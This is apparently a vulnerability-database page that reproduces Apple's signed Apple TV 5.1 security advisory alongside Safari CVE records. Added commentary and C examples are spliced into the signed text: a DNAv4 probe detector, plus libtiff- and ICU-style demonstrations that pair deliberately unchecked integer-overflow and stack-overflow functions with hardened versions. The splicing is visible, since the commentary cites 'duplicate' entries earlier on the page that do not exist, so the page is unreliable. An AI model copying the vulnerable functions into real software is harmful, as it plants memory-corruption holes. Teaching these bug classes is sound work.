Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Safari is a web browser developed by Apple and is the default browser included with Mac OS X and iOS. The vulnerabilities exist in WebKit as used in Apple Safari versions prior to 6.0.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-24-1 Apple TV 5.1
Apple TV 5.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may broadcast
MAC addresses of previously accessed networks per the DNAv4
protocol. This issue was addressed by disabling DNAv4 on unencrypted
Wi-Fi networks.
CVE-ID
CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
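The DNAv4 entry above describes a host probing for gateways it remembers from earlier networks (RFC 4436 sends such probes as unicast ARP Requests addressed to the remembered gateway MAC), which is what lets a hostile network learn where a device has been. The following is an added detection example, not Apple's or Immunity's code: it parses raw Ethernet/ARP frames and flags the DNAv4 probe shape. The two frames, the host and gateway addresses in them, and the heuristic (unicast ARP Request whose target hardware address equals the Ethernet destination) are constructed assumptions for this example.

```c
/* DNAv4 (RFC 4436) probe detection over raw Ethernet/ARP frames.
 * Added illustration, not Apple's or Immunity's code. The two frames at the
 * bottom are constructed for this example. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define ETH_HDR_LEN    14
#define ARP_LEN        28
#define FRAME_LEN      (ETH_HDR_LEN + ARP_LEN)
#define ETHERTYPE_ARP  0x0806
#define ARP_OP_REQUEST 1

typedef struct {
    uint8_t  dst_mac[6], src_mac[6];          /* Ethernet header */
    uint16_t oper;                            /* ARP opcode */
    uint8_t  sha[6], spa[4], tha[6], tpa[4];  /* ARP addresses */
} arp_frame;

/* Parse an Ethernet-framed IPv4 ARP packet. 0 on success, -1 if the buffer
 * is short or is not Ethernet/IPv4 ARP. */
int parse_arp(const uint8_t *buf, size_t len, arp_frame *out) {
    if (len < FRAME_LEN) return -1;
    if (((buf[12] << 8) | buf[13]) != ETHERTYPE_ARP) return -1;
    const uint8_t *a = buf + ETH_HDR_LEN;
    /* htype 1 (Ethernet), ptype 0x0800 (IPv4), hlen 6, plen 4 */
    if (a[0] != 0 || a[1] != 1 || a[2] != 0x08 || a[3] != 0x00 ||
        a[4] != 6 || a[5] != 4) return -1;
    memcpy(out->dst_mac, buf, 6);
    memcpy(out->src_mac, buf + 6, 6);
    out->oper = (uint16_t)((a[6] << 8) | a[7]);
    memcpy(out->sha, a + 8, 6);
    memcpy(out->spa, a + 14, 4);
    memcpy(out->tha, a + 18, 6);
    memcpy(out->tpa, a + 24, 4);
    return 0;
}

static int mac_is_broadcast(const uint8_t *m) {
    static const uint8_t b[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
    return memcmp(m, b, 6) == 0;
}
static int mac_is_zero(const uint8_t *m) {
    static const uint8_t z[6] = {0};
    return memcmp(m, z, 6) == 0;
}

/* An ordinary ARP Request is broadcast with an all-zero target hardware
 * address. A DNAv4 reachability probe is a unicast ARP Request addressed to
 * the gateway MAC the host remembers from a previous network, so that MAC
 * (and the remembered gateway IP in tpa) is visible to anyone on the new
 * link. Heuristic (assumption): returns 1 if the frame has that shape. */
int is_dnav4_probe(const arp_frame *f) {
    if (f->oper != ARP_OP_REQUEST) return 0;
    if (mac_is_broadcast(f->dst_mac) || mac_is_zero(f->tha)) return 0;
    return memcmp(f->dst_mac, f->tha, 6) == 0;
}

/* -1 = not a parseable ARP frame, 0 = ordinary ARP, 1 = DNAv4-style probe */
int classify_frame(const uint8_t *buf, size_t len) {
    arp_frame f;
    if (parse_arp(buf, len, &f) != 0) return -1;
    return is_dnav4_probe(&f);
}

void format_mac(const uint8_t *m, char out[18]) {
    snprintf(out, 18, "%02x:%02x:%02x:%02x:%02x:%02x",
             m[0], m[1], m[2], m[3], m[4], m[5]);
}

/* If the frame is a probe, write the leaked gateway MAC as text and return 1. */
int leaked_gateway(const uint8_t *buf, size_t len, char out[18]) {
    arp_frame f;
    if (parse_arp(buf, len, &f) != 0 || !is_dnav4_probe(&f)) return 0;
    format_mac(f.tha, out);
    return 1;
}

/* Constructed: host 02:00:00:00:00:01 joining 192.168.1.0/24 resolves its
 * gateway the normal way (broadcast destination, all-zero tha). */
const uint8_t NORMAL_ARP[FRAME_LEN] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x02,0x00,0x00,0x00,0x00,0x01, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 0x06, 0x04, 0x00,0x01,
    0x02,0x00,0x00,0x00,0x00,0x01, 0xc0,0xa8,0x01,0x32,
    0x00,0x00,0x00,0x00,0x00,0x00, 0xc0,0xa8,0x01,0x01 };
/* Constructed: the same host probes for the router it remembers from a
 * previous network (10.0.0.1 at 00:11:22:33:44:55), exposing both values. */
const uint8_t DNAV4_PROBE[FRAME_LEN] = {
    0x00,0x11,0x22,0x33,0x44,0x55, 0x02,0x00,0x00,0x00,0x00,0x01, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 0x06, 0x04, 0x00,0x01,
    0x02,0x00,0x00,0x00,0x00,0x01, 0x0a,0x00,0x00,0x17,
    0x00,0x11,0x22,0x33,0x44,0x55, 0x0a,0x00,0x00,0x01 };

int main(void) {
    const uint8_t *frames[2] = { NORMAL_ARP, DNAV4_PROBE };
    for (int i = 0; i < 2; i++) {
        char mac[18];
        if (leaked_gateway(frames[i], FRAME_LEN, mac))
            printf("frame %d: DNAv4 probe, remembered gateway MAC %s\n", i, mac);
        else
            printf("frame %d: classification %d\n", i, classify_frame(frames[i], FRAME_LEN));
    }
    return 0;
}
```

On a real capture the same check would run over every ARP Request seen shortly after a client associates; the fix Apple describes (no DNAv4 on unencrypted Wi-Fi) removes the probe where the link is sniffable, but a client that still probes on an open network is detectable this way.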
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue was addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
CVE-2011-3328
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG image may lead to an
unexpected application termination or arbitrary code execution
Description: A double free issue existed in ImageIO's handling of
JPEG images. This issue was addressed through improved memory
management.
CVE-ID
CVE-2012-3726 : Phil of PKJE Consulting
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173
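The libTIFF entry above (and the identical entry earlier on this page) names only "an integer overflow" fixed by "improved validation". The following added example, not libtiff's code, shows the shape of that bug class in a tile decoder: a 32-bit product of attacker-controlled tile dimensions wraps, a too-small buffer is allocated, and the subsequent decode overruns it; beside it is the checked version. The struct, MAX_TILE_BYTES cap and the dimensions are constructed for this example.

```c
/* Integer-overflow pattern of the kind described for TIFF tile handling.
 * Added illustration, not libtiff's code. MAX_TILE_BYTES and the dimensions
 * below are constructed for this example. */
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

typedef struct {
    uint32_t tile_width;      /* TileWidth tag, attacker-controlled */
    uint32_t tile_length;     /* TileLength tag, attacker-controlled */
    uint32_t bytes_per_pixel; /* derived from BitsPerSample/SamplesPerPixel */
} tile_dims;

/* Vulnerable shape: three 32-bit operands multiplied in 32-bit arithmetic,
 * so the product wraps modulo 2^32. A 65536 x 65536 tile at 4 bytes/pixel
 * yields 0; the allocation "succeeds" and the decoder then writes the real
 * 16 GiB raster into it. */
uint32_t tile_bytes_unchecked(const tile_dims *d) {
    return d->tile_width * d->tile_length * d->bytes_per_pixel;
}

#define MAX_TILE_BYTES (64u * 1024u * 1024u)  /* assumption: policy cap */

/* Hardened: widen before multiplying, reject zero dimensions, and bound the
 * result by a cap so the final multiply cannot overflow either. Returns 0
 * and stores the byte count, or -1 on overflow / oversize. */
int tile_bytes_checked(const tile_dims *d, size_t *out) {
    if (d->tile_width == 0 || d->tile_length == 0 || d->bytes_per_pixel == 0)
        return -1;
    uint64_t pixels = (uint64_t)d->tile_width * d->tile_length; /* fits in 64 bits */
    /* pixels * bpp <= cap  <=>  pixels <= cap / bpp (integer division) */
    if (pixels > MAX_TILE_BYTES / d->bytes_per_pixel) return -1;
    *out = (size_t)(pixels * d->bytes_per_pixel);
    return 0;
}

/* Allocate a tile raster only through the checked path. NULL on rejection. */
uint8_t *alloc_tile(const tile_dims *d) {
    size_t n;
    if (tile_bytes_checked(d, &n) != 0) return NULL;
    return calloc(n, 1);
}

int main(void) {
    /* Constructed: a benign 256x256 RGBA tile, a crafted tile whose 32-bit
     * product wraps to exactly 0, and one that wraps to a plausible size. */
    tile_dims benign  = { 256u, 256u, 4u };
    tile_dims crafted = { 65536u, 65536u, 4u };
    tile_dims wrapped = { 100000u, 100000u, 1u };
    const tile_dims *all[3] = { &benign, &crafted, &wrapped };
    for (int i = 0; i < 3; i++) {
        size_t n = 0;
        int rc = tile_bytes_checked(all[i], &n);
        printf("%ux%ux%u: unchecked=%u checked=%s\n",
               (unsigned)all[i]->tile_width, (unsigned)all[i]->tile_length,
               (unsigned)all[i]->bytes_per_pixel,
               (unsigned)tile_bytes_unchecked(all[i]),
               rc == 0 ? "ok" : "rejected");
    }
    uint8_t *t = alloc_tile(&benign);
    free(t);
    return 0;
}
```

The third input is the dangerous case in practice: 100000 x 100000 x 1 wraps to 1410065408, a size that looks legitimate and may even allocate, while the decoder believes it has room for 10 GB.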
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2011-4599
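The ICU entry above (and its duplicate earlier on this page) says only that a stack buffer overflow in locale ID handling was fixed by "improved bounds checking". The following added example, not ICU's code, shows the pattern: a canonicalizer that stages the result in a fixed on-stack buffer with no length accounting, beside a version that accounts for every byte. The canonical form used (language lowercased, region uppercased, variant verbatim), LOCALE_CAPACITY, and the two locale IDs are constructed for this example.

```c
/* Fixed-size stack buffer pattern in locale ID canonicalization.
 * Added illustration, not ICU's code. LOCALE_CAPACITY and the locale IDs
 * below are constructed for this example. */
#include <stddef.h>
#include <string.h>
#include <ctype.h>
#include <stdio.h>

#define LOCALE_CAPACITY 32  /* assumption: a small fixed on-stack buffer */

/* Canonical form used here: language lowercased, region uppercased,
 * separators normalised to '_', variant copied verbatim. */
static char canon_char(char c, int *field) {
    if (c == '_' || c == '-') { (*field)++; return '_'; }
    if (*field == 0) return (char)tolower((unsigned char)c);
    if (*field == 1) return (char)toupper((unsigned char)c);
    return c;
}

/* Hardened: every byte written is checked against cap, leaving room for the
 * NUL. Returns the canonical length, or -1 if the ID does not fit. */
int canonicalize_bounded(const char *id, char *out, size_t cap) {
    size_t n = 0;
    int field = 0;
    for (const char *p = id; *p; ++p) {
        if (n + 1 >= cap) return -1;
        out[n++] = canon_char(*p, &field);
    }
    out[n] = '\0';
    return (int)n;
}

/* Vulnerable shape: the same transformation staged in a fixed stack buffer
 * with no length accounting. The loop writes tmp[n] for every input byte,
 * so any ID of LOCALE_CAPACITY bytes or more runs off the end of tmp into
 * the saved frame state. Kept to show the pattern; only called below with
 * a short input. */
void canonicalize_unbounded(const char *id, char *out) {
    char tmp[LOCALE_CAPACITY];
    size_t n = 0;
    int field = 0;
    for (const char *p = id; *p; ++p)
        tmp[n++] = canon_char(*p, &field);   /* no bound against sizeof tmp */
    tmp[n] = '\0';
    strcpy(out, tmp);
}

/* Constructed inputs. The crafted one is a 66-byte ID with a 60-byte variant. */
const char BENIGN_ID[]  = "EN_us_posix";
const char CRAFTED_ID[] = "en_US_"
    "xxxxxxxxxx" "xxxxxxxxxx" "xxxxxxxxxx" "xxxxxxxxxx" "xxxxxxxxxx" "xxxxxxxxxx";

int main(void) {
    char out[LOCALE_CAPACITY];
    int n = canonicalize_bounded(BENIGN_ID, out, sizeof out);
    printf("%s -> %s (%d)\n", BENIGN_ID, out, n);
    n = canonicalize_bounded(CRAFTED_ID, out, sizeof out);
    printf("crafted %zu-byte ID -> %s\n", strlen(CRAFTED_ID),
           n < 0 ? "rejected" : out);
    return 0;
}
```

The bounded version fails closed on the crafted ID; the unbounded one would overwrite whatever follows tmp on the stack. The check is placed before the write, not after, because by the time a post-hoc length comparison runs the frame is already corrupted.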
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues were addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in
JavaScriptCore. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3678 : Apple Product Security
CVE-2012-3679 : Chris Leary of Mozilla
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
=PSL+
-----END PGP SIGNATURE-----
| VAR-201207-0488 | CVE-2012-0680 | Authentication bypass vulnerability in multiple Apple products |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Safari before 6.0 does not properly handle the autocomplete attribute of a password input element, which allows remote attackers to bypass authentication by leveraging an unattended workstation. Apple Safari is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and gain access to potentially sensitive information.
Versions prior to Safari 6.0 are vulnerable.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Safari is a web browser developed by Apple and is the default browser included with Mac OS X and iOS.
| VAR-201207-0487 | CVE-2012-0679 | Arbitrary file read vulnerability in Apple Safari before 6.0 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Apple Safari before 6.0 allows remote attackers to read arbitrary files via a feed:// URL. Apple Safari is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Safari is a web browser developed by Apple and is the default browser included with Mac OS X and iOS.
| VAR-201207-0486 | CVE-2012-0678 | Cross-site scripting vulnerability in Apple Safari before 6.0 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Apple Safari before 6.0 allows remote attackers to inject arbitrary web script or HTML via a feed:// URL.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Apple Safari versions prior to 6.0.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Safari is a web browser developed by Apple and is the default browser included with Mac OS X and iOS.